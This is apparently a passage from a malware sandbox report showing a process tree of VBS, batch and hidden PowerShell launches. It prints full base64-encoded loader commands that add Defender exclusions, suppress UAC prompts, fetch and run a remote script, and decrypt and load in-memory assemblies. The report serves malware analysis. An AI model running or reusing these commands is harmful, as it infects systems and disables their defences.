QkNpQUJDbkFCQ3RBQkM7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJHhkYnZhb3FpdGxhaWJtY2tlY3F0enFocnd4YXJyd3VvbXp0dWFhbHZpd3Jmb2JyeHl2LkFCQ0lBQkNuQUJDdkFCQ29BQkNrQUJDZUFCQygkbnVsbCwgJHBhcmFtMl92YXIpOycuUmVwbGFjZSgnQUJDJywgJycpO30kcW1ka3hmZndnbGliZXJiZWl1eGFvZnJnbyA9ICRlbnY6VVNFUk5BTUU7JG1scXhnYmJ4cnl1dnR6c29lY3ZmcWl5enQgPSAnQzpcVXNlcnNcJyArICRxbWRreGZmd2dsaWJlcmJlaXV4YW9mcmdvICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbWxxeGdiYnhyeXV2dHpzb2VjdmZxaXl6dDskdWR5eHI9W1N5c3RlbS5JTy5GaWxlXTo6KCd0eGVUbGxBZGFlUidbLTEuLi0xMV0gLWpvaW4gJycpKCRtbHF4Z2JieHJ5dXZ0enNvZWN2ZnFpeXp0KS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkeWRhIGluICR1ZHl4cikgewlpZiAoJHlkYS5TdGFydHNXaXRoKCc6OicpKQl7CQkkZG5xZWw9JHlkYS5TdWJzdHJpbmcoMik7CQlicmVhazsJfX0kdnRzcHN1bmViZWl0bXlzbHNnamhqemFncz1bc3RyaW5nW11dJGRucWVsLlNwbGl0KCdcJyk7SUVYICckcHpvY2V4eW52bmh0dG9jd3NuenhlY25xcD1pYnB4Z21oanR3a2Jnem4gKHlsY2Z4ZmV0ZHdqc2RpciAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDcnRdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzZTZBQkM0QUJDU0FCQ3RBQkNyaUFCQ25BQkNnQUJDKCR2dHNwc3VuZWJlaXRteXNsc2dqaGp6YWdzWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJGV3Ym5ud3Rtd2R1emN4aGtncmtrcnlyaGs9aWJweGdtaGp0d2tiZ3puICh5bGNmeGZldGR3anNkaXIgKFtBQkNDQUJDb0FCQ25BQkN2QUJDZUFCQ3JBQkN0XTo6QUJDRkFCQ3JBQkNvQUJDbUFCQ0JBQkNhQUJDc0FCQ2VBQkM2QUJDNEFCQ1NBQkN0ckFCQ2lBQkNuQUJDZygkdnRzcHN1bmViZWl0bXlzbHNnamhqemFnc1sxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtxbWFpbm1teG56YXh6aHJvaHdsaHhwcHJuICRwem9jZXh5bnZuaHR0b2N3c256eGVjbnFwICRudWxsO3FtYWlubW14bnpheHpocm9od2xoeHBwcm4gJGV3Ym5ud3Rtd2R1emN4aGtncmtrcnlyaGsgKCxbc3RyaW5nW11dICgnJUFCQycpKTs=')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • WerFault.exe (PID: 8152 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7628 -s 3380 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • wscript.exe (PID: 7848 cmdline: "C:\Windows\system32\wscript.exe" "C:\Users\user\AppData\Roaming\WindowsUpdate_706.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 7896 cmdline: "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_706.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7948 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\WindowsUpdate_706.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8000 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyRid2p2cGFqcnB1d2R2a2h2ZW90eXZhc2xiPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJHFiampuZHh1cHZuamlzcXlqemRqaWx6bGI9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRnbm5icmFkeXV6emFpY3F6amdvdWx3dmRhPU5ldy1PYmplY3QgU3lzdGVtLklPLkNBQkNvbUFCQ3ByQUJDZUFCQ3NzQUJDaW9BQkNuLkFCQ0daQUJDaXBBQkNTdEFCQ3JlQUJDYW1BQkMoJGJ3anZwYWpycHV3ZHZraHZlb3R5dmFzbGIsIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdubmJyYWR5dXp6YWljcXpqZ291bHd2ZGEuQ29weVRvKCRxYmpqbmR4dXB2bmppc3F5anpkamlsemxiKTsJJGdubmJyYWR5dXp6YWljcXpqZ291bHd2ZGEuRGlzcG9zZSgpOwkkYndqdnBhanJwdXdkdmtodmVvdHl2YXNsYi5EaXNwb3NlKCk7CSRxYmpqbmR4dXB2bmppc3F5anpkamlsemxiLkRpc3Bvc2UoKTsJJHFiampuZHh1cHZuamlzcXlqemRqaWx6bGIuVG9BcnJheSgpO31mdW5jdGlvbiBxbWFpbm1teG56YXh6aHJvaHdsaHhwcHJuKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewkJSUVYICckbGJwYnNmYnhoZ3FrdHh2amxudHJ4Yndta3pmbHFwa3NqYmZ6b3didT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJHhkYnZhb3FpdGxhaWJtY2tlY3F0enFocnd4YXJyd3VvbXp0dWFhbHZpd3Jmb2JyeHl2PSRsYnBic2ZieGhncWt0eHZqbG50cnhid21remZscXBrc2piZnpvd2J1LkFCQ0VBQkNuQUJDdEFCQ3JBQkN5QUJDUEFCQ29BQkNpQUJDbkFCQ3RBQkM7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJHhkYnZhb3FpdGxhaWJtY2tlY3F0enFocnd4YXJyd3VvbXp0dWFhbHZpd3Jmb2JyeHl2LkFCQ0lBQkNuQUJDdkFCQ29BQkNrQUJDZUFCQygkbnVsbCwgJHBhcmFtMl92YXIpOycuUmVwbGFjZSgnQUJDJywgJycpO30kcW1ka3hmZndnbGliZXJiZWl1eGFvZnJnbyA9ICRlbnY6VVNFUk5BTUU7JG1scXhnYmJ4cnl1dnR6c29lY3ZmcWl5enQgPSAnQzpcVXNlcnNcJyArICRxbWRreGZmd2dsaWJlcmJlaXV4YW9mcmdvICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbWxxeGdiYnhyeXV2dHpzb2VjdmZxaXl6dDskdWR5eHI9W1N5c3RlbS5JTy5GaWxlXTo6KCd0eGVUbGxBZGFlUidbLTEuLi0xMV0gLWpvaW4gJycpKCRtbHF4Z2JieHJ5dXZ0enNvZWN2ZnFpeXp0KS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkeWRhIGluICR1ZHl4cikgewlpZiAoJHlkYS5TdGFydHNXaXRoKCc6OicpKQl7CQkkZG5xZWw9JHlkYS5TdWJzdHJpbmcoMik7CQlicmVhazsJfX0kdnRzcHN1bmViZWl0bXlzbHNnamhqemFncz1bc3RyaW5nW11dJGRucWVsLlNwbGl0KCdcJyk7SUVYICckcHpvY2V4eW52bmh0dG9jd3NuenhlY25xcD1pYnB4Z21oanR3a2Jnem4gKHlsY2Z4ZmV0ZHdqc2RpciAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDcnRdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzZTZBQkM0QUJDU0FCQ3RBQkNyaUFCQ25BQkNnQUJDKCR2dHNwc3VuZWJlaXRteXNsc2dqaGp6YWdzWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJGV3Ym5ud3Rtd2R1emN4aGtncmtrcnlyaGs9aWJweGdtaGp0d2tiZ3puICh5bGNmeGZldGR3anNkaXIgKFtBQkNDQUJDb0FCQ25BQkN2QUJDZUFCQ3JBQkN0XTo6QUJDRkFCQ3JBQkNvQUJDbUFCQ0JBQkNhQUJDc0FCQ2VBQkM2QUJDNEFCQ1NBQkN0ckFCQ2lBQkNuQUJDZygkdnRzcHN1bmViZWl0bXlzbHNnamhqemFnc1sxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtxbWFpbm1teG56YXh6aHJvaHdsaHhwcHJuICRwem9jZXh5bnZuaHR0b2N3c256eGVjbnFwICRudWxsO3FtYWlubW14bnpheHpocm9od2xoeHBwcm4gJGV3Ym5ud3Rtd2R1emN4aGtncmtrcnlyaGsgKCxbc3RyaW5nW11dICgnJUFCQycpKTs=')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • WerFault.exe (PID: 4820 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8000 -s 3228 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • wscript.exe (PID: 5032 cmdline: "C:\Windows\system32\wscript.exe" "C:\Users\user\AppData\Roaming\WindowsUpdate_394.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 7376 cmdline: "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_394.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7428 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\WindowsUpdate_394.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 4696 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyRid2p2cGFqcnB1d2R2a2h2ZW90eXZhc2xiPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJHFiampuZHh1cHZuamlzcXlqemRqaWx6bGI9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRnbm5icmFkeXV6emFpY3F6amdvdWx3dmRhPU5ldy1PYmplY3QgU3lzdGVtLklPLkNBQkNvbUFCQ3ByQUJDZUFCQ3NzQUJDaW9BQkNuLkFCQ0daQUJDaXBBQkNTdEFCQ3JlQUJDYW1BQkMoJGJ3anZwYWpycHV3ZHZraHZlb3R5dmFzbGIsIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdubmJyYWR5dXp6YWljcXpqZ291bHd2ZGEuQ29weVRvKCRxYmpqbmR4dXB2bmppc3F5anpkamlsemxiKTsJJGdubmJyYWR5dXp6YWljcXpqZ291bHd2ZGEuRGlzcG9zZSgpOwkkYndqdnBhanJwdXdkdmtodmVvdHl2YXNsYi5EaXNwb3NlKCk7CSRxYmpqbmR4dXB2bmppc3F5anpkamlsemxiLkRpc3Bvc2UoKTsJJHFiampuZHh1cHZuamlzcXlqemRqaWx6bGIuVG9BcnJheSgpO31mdW5jdGlvbiBxbWFpbm1teG56YXh6aHJvaHdsaHhwcHJuKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewkJSUVYICckbGJwYnNmYnhoZ3FrdHh2amxudHJ4Yndta3pmbHFwa3NqYmZ6b3didT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJHhkYnZhb3FpdGxhaWJtY2tlY3F0enFocnd4YXJyd3VvbXp0dWFhbHZpd3Jmb2JyeHl2PSRsYnBic2ZieGhncWt0eHZqbG50cnhid21remZscXBrc2piZnpvd2J1LkFCQ0VBQkNuQUJDdEFCQ3JBQkN5QUJDUEFCQ29BQkNpQUJDbkFCQ3RBQkM7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJHhkYnZhb3FpdGxhaWJtY2tlY3F0enFocnd4YXJyd3VvbXp0dWFhbHZpd3Jmb2JyeHl2LkFCQ0lBQkNuQUJDdkFCQ29BQkNrQUJDZUFCQygkbnVsbCwgJHBhcmFtMl92YXIpOycuUmVwbGFjZSgnQUJDJywgJycpO30kcW1ka3hmZndnbGliZXJiZWl1eGFvZnJnbyA9ICRlbnY6VVNFUk5BTUU7JG1scXhnYmJ4cnl1dnR6c29lY3ZmcWl5enQgPSAnQzpcVXNlcnNcJyArICRxbWRreGZmd2dsaWJlcmJlaXV4YW9mcmdvICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbWxxeGdiYnhyeXV2dHpzb2VjdmZxaXl6dDskdWR5eHI9W1N5c3RlbS5JTy5GaWxlXTo6KCd0eGVUbGxBZGFlUidbLTEuLi0xMV0gLWpvaW4gJycpKCRtbHF4Z2JieHJ5dXZ0enNvZWN2ZnFpeXp0KS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkeWRhIGluICR1ZHl4cikgewlpZiAoJHlkYS5TdGFydHNXaXRoKCc6OicpKQl7CQkkZG5xZWw9JHlkYS5TdWJzdHJpbmcoMik7CQlicmVhazsJfX0kdnRzcHN1bmViZWl0bXlzbHNnamhqemFncz1bc3RyaW5nW11dJGRucWVsLlNwbGl0KCdcJyk7SUVYICckcHpvY2V4eW52bmh0dG9jd3NuenhlY25xcD1pYnB4Z21oanR3a2Jnem4gKHlsY2Z4ZmV0ZHdqc2RpciAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDcnRdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzZTZBQkM0QUJDU0FCQ3RBQkNyaUFCQ25BQkNnQUJDKCR2dHNwc3VuZWJlaXRteXNsc2dqaGp6YWdzWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJGV3Ym5ud3Rtd2R1emN4aGtncmtrcnlyaGs9aWJweGdtaGp0d2tiZ3puICh5bGNmeGZldGR3anNkaXIgKFtBQkNDQUJDb0FCQ25BQkN2QUJDZUFCQ3JBQkN0XTo6QUJDRkFCQ3JBQkNvQUJDbUFCQ0JBQkNhQUJDc0FCQ2VBQkM2QUJDNEFCQ1NBQkN0ckFCQ2lBQkNuQUJDZygkdnRzcHN1bmViZWl0bXlzbHNnamhqemFnc1sxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtxbWFpbm1teG56YXh6aHJvaHdsaHhwcHJuICRwem9jZXh5bnZuaHR0b2N3c256eGVjbnFwICRudWxsO3FtYWlubW14bnpheHpocm9od2xoeHBwcm4gJGV3Ym5ud3Rtd2R1emN4aGtncmtrcnlyaGsgKCxbc3RyaW5nW11dICgnJUFCQycpKTs=')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • WerFault.exe (PID: 7880 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4696 -s 3244 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • wscript.exe (PID: 3380 cmdline: "C:\Windows\system32\wscript.exe" "C:\Users\user\AppData\Roaming\WindowsUpdate_801.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 1888 cmdline: "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_801.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5784 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\WindowsUpdate_801.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
